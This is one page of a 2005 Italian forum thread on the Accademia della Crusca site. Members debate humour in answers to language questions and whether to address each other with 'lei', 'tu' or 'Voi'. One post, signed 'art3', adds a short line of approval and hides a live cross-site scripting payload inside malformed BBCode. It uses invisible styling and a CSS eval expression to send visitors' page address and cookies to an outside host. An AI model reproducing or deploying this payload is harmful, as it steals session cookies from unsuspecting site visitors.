Accademia Accademia della Crusca
Cerca nel sito 
 FAQFAQ   CercaCerca   IscrittiIscritti   Gruppo  utentiGruppo utenti   IscrizioneIscrizione 
 ProfiloProfilo   Login per controllare i messaggi privatiLogin per controllare i messaggi privati   LoginLogin 

Il Moderatore c'è, vede tutto...
Vai a Precedente  1, 2, 3  Successivo

Questo forum è bloccato. Non è possibile modificare, cancellare, rispondere o scrivere messaggi   Questo forum è bloccato. Non è possibile rispondere o modificare messaggi    Index del forum -> Consulenza linguistica
Mostra argomento precedente :: Mostra argomento successivo  
Autore Messaggio
Marco1971

Iscritto: 17 Gen 2005

MessaggioInviato: Ven, 08 Lug 2005; 0:39    Oggetto: Rispondi con citazione

Carlo ha scritto:
C'è una regola di comportamento, a riguardo? Qual è?

Carlo, o Carlo... mmmhhh... avrà capito quel che le voglio dire, ovvía! Laughing
Ma quella lingua si chiama d’una patria, la quale convertisce i vocaboli ch’ella ha accattati da altri nell’uso suo, et è sí potente che i vocaboli accattati non la disordinano, ma ella disordina loro.
Vai ad inizio pagina
Mostra il profilo utente Invia un messaggio privato Invia email
Carlo

MessaggioInviato: Ven, 08 Lug 2005; 0:50    Oggetto: Più difficile di smettere di fumare Rispondi con citazione

Marco1971 ha scritto:
Carlo ha scritto:
C'è una regola di comportamento, a riguardo? Qual è?

Carlo, o Carlo... mmmhhh... avrà capito quel che le voglio dire, ovvía! Laughing

Ma che diavolo mi prende? Anche questo me lo aveva già detto! Embarassed
Joseph

Iscritto: 07 Lug 2005
Località di residenza: Rouen

MessaggioInviato: Sab, 09 Lug 2005; 11:15    Oggetto: RISPOSTA, Rispondi con citazione

A me piace questo forum , in quanto tratta di un argomento interessantissimo. Però vorrei pure segnalare che non ci si scrive per celiare...! come mai quando ho fatto delle domande sulla lingua , mi hanno risposto degli "adolescenti incapaci di restare seri" ? adesso , bisogna anche ridere quando si va sui forum!
E quando si fanno domande che ci stanno a cuore, perché si ama la lingua italiana e si vorrebbe capirla meglio , anche essendo pignoli, ...si deve accettare tante celie...?

Ci devono essere dei forum più...seri...a parer mio.

Ciaoo!
Akkusativ

Iscritto: 28 Apr 2005

MessaggioInviato: Sab, 09 Lug 2005; 17:54    Oggetto: Re: RISPOSTA, Rispondi con citazione

Joseph ha scritto:
A me piace questo forum , in quanto tratta di un argomento interessantissimo. Però vorrei pure segnalare che non ci si scrive per celiare...! come mai quando ho fatto delle domande sulla lingua , mi hanno risposto degli "adolescenti incapaci di restare seri" ? adesso , bisogna anche ridere quando si va sui forum!
E quando si fanno domande che ci stanno a cuore, perché si ama la lingua italiana e si vorrebbe capirla meglio , anche essendo pignoli, ...si deve accettare tante celie...?

Ci devono essere dei forum più...seri...a parer mio.

Ciaoo!

Guardi, mi permetto di farLe presente che "serî" non significa affatto "seriosi". Si può amabilmente celiare, pur dando risposte interessanti ed esaurienti; se vuole avere delle risposte "spersonalizzate", forse, farebbe meglio a consultare un dizionario: lì, glie lo assicuro, l'umorismo non trova dimora.
Ci lasci, la prego, scherzare - è anche un modo per fare da contrappeso alla serietà, checché lei ne possa pensare, delle discussioni che qui si fanno -; alle sue domande, molti hanno risposto, cercando di fugare i suoi dubbî, pure se, talora, con un tocco d'umorismo. Nessuno l'ha derisa, mi creda.
Taluni, magari, hanno espresso disappunto, perché le risposte alle domande che lei poneva potevano, facilmente, essere trovate in un qualsiasi dizionario della lingua italiana, ma, nonostante ciò, avrà veduto che le hanno risposto.
La prego non s'indisponga per il nostro scherzare, mentre diamo (rectius "dànno" Very Happy) risposte serie, e cerchi, per il futuro, prima di dare definizioni dei frequentanti di questo forum di accertarsi che esse si attaglino ai suddetti...

Akkusativ.

ECG
Vai ad inizio pagina
Mostra il profilo utente Invia un messaggio privato
Joseph

Iscritto: 07 Lug 2005
Località di residenza: Rouen

MessaggioInviato: Sab, 09 Lug 2005; 18:51    Oggetto: risposta , Rispondi con citazione

ho letto il Suo messaggio , e rispondo solo che per sfortuna , i dizionari non sono bastati , per la ricerca che faccio.

ciaoo.
cuci

Iscritto: 10 Lug 2005
Località di residenza: Varese

MessaggioInviato: Mar, 12 Lug 2005; 0:10    Oggetto: Rispondi con citazione

Perdonate la divagazione, ma mi chiedevo se, come temo, son l'unico a provar lieve imbarazzo nel trovarmi in un forum ove i più si rivolgono l'un l'altro in terza persona?
Marco1971

MessaggioInviato: Mar, 12 Lug 2005; 0:17    Oggetto: Rispondi con citazione

L’uso del lei in questa sede rimonta agli albori del forum, e se ha visitato l’archivio, lo vedrà. Non siamo in qualsiasi forum, siamo qui ospitati dall’Accademia della Crusca. Personalmente, non apprezzo il darsi del tu al primo incontro e trovo del tutto logico il darsi del lei, anche perché non sempre è chiaro se si parla con coetanei o persone piú anziane, e anche come prassi generale. Ma è solo il mio personale punto di vista.
Ma quella lingua si chiama d’una patria, la quale convertisce i vocaboli ch’ella ha accattati da altri nell’uso suo, et è sí potente che i vocaboli accattati non la disordinano, ma ella disordina loro.
Vai ad inizio pagina
Mostra il profilo utente Invia un messaggio privato Invia email
Brazilian dude

Iscritto: 12 Apr 2005

MessaggioInviato: Mar, 12 Lug 2005; 2:31    Oggetto: Rispondi con citazione

Io uso il Voi.

Brazilian dude
Vai ad inizio pagina
Mostra il profilo utente Invia un messaggio privato MSN Messenger
dario

Iscritto: 28 Feb 2005
Località di residenza: Roma

MessaggioInviato: Mar, 12 Lug 2005; 11:21    Oggetto: Re: risposta , Rispondi con citazione

Joseph ha scritto:
ho letto il Suo messaggio , e rispondo solo che per sfortuna , i dizionari non sono bastati , per la ricerca che faccio.

ciaoo.

Bentornato tra noi, Joseph. Wink
Vai ad inizio pagina
dario

Iscritto: 28 Feb 2005
Località di residenza: Roma

MessaggioInviato: Mar, 12 Lug 2005; 11:32    Oggetto: Rispondi con citazione

cuci ha scritto:
Perdonate la divagazione, ma mi chiedevo se, come temo, son l'unico a provar lieve imbarazzo nel trovarmi in un forum ove i più si rivolgono l'un l'altro in terza persona?

No, non è l'unico. Anch'io (<-notare l'apostrofo [mentore] Smile) all'inizio ero un po' perplesso. Dare del tu in un forum non credo sia sbagliatissimo, visto che è un contesto in cui i frequentatori condividono la stessa passione. Do quasi per scontato, quando m'iscrivo a un forum, che i partecipanti siano quasi miei amici, come se entrassi in una palestra per la prima volta, non credo che direi "mi scusi, quanti kg devo mettere nella Pulley Machine?". Wink
Vai ad inizio pagina
art3

Iscritto: 19 Lug 2005

MessaggioInviato: Mar, 19 Lug 2005; 15:53    Oggetto: Rispondi con citazione

Tutta la mia approvazione, tenga duro!

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Vai ad inizio pagina
GIORGIO P.

Iscritto: 02 Mag 2005
Località di residenza: Welschtirol

MessaggioInviato: Mar, 19 Lug 2005; 16:05    Oggetto: Rispondi con citazione

Brazilian dude ha scritto:
Io uso il Voi.

Brazilian dude
L'uso del "Voi" non è simpatico: ricorda un certo periodo in cui la ragione venne offuscata da personaggi sgraditi. A me non piace proprio! Exclamation
Brazilian dude

Iscritto: 12 Apr 2005

MessaggioInviato: Mar, 19 Lug 2005; 16:52    Oggetto: Rispondi con citazione

Neanche quello di Lei, soprattutto in questo forum. Ma non ne discuto più, ho già dato la ragione della mia preferenza.

Brazilian dude
Vai ad inizio pagina
elrubio

Iscritto: 25 Mar 2005

MessaggioInviato: Ven, 19 Ago 2005; 14:55    Oggetto: non meritano altro che essere ignorati Rispondi con citazione

Coloro che insultano non meritano altro di essere ignorati. Li si ignori! Si stuferanno di inveire a vuoto e se ne andranno. Very Happy
Vai ad inizio pagina
Serveto

Iscritto: 02 Set 2005

MessaggioInviato: Ven, 02 Set 2005; 13:56    Oggetto: Rispondi con citazione

Ho notato che l'utente Polymetis usa questo forum per mascherare con dubbi linguistici le sue polemiche contro un gruppo religioso tacciadolo di incompetenza. Questo mi pare che sia paradigmatico di quel clima "da stadio" che sembra ormai permeare ogni discussione in Italia.
Vai ad inizio pagina
Mostra i messaggi a partire da:   
Questo forum è bloccato. Non è possibile modificare, cancellare, rispondere o scrivere messaggi   Questo forum è bloccato. Non è possibile rispondere o modificare messaggi    Index del forum -> Consulenza linguistica Tutti gli orari del forum sono CET (Europa)
Vai a Precedente  1, 2, 3  Successivo
Pag. 2 di 3

Vai a: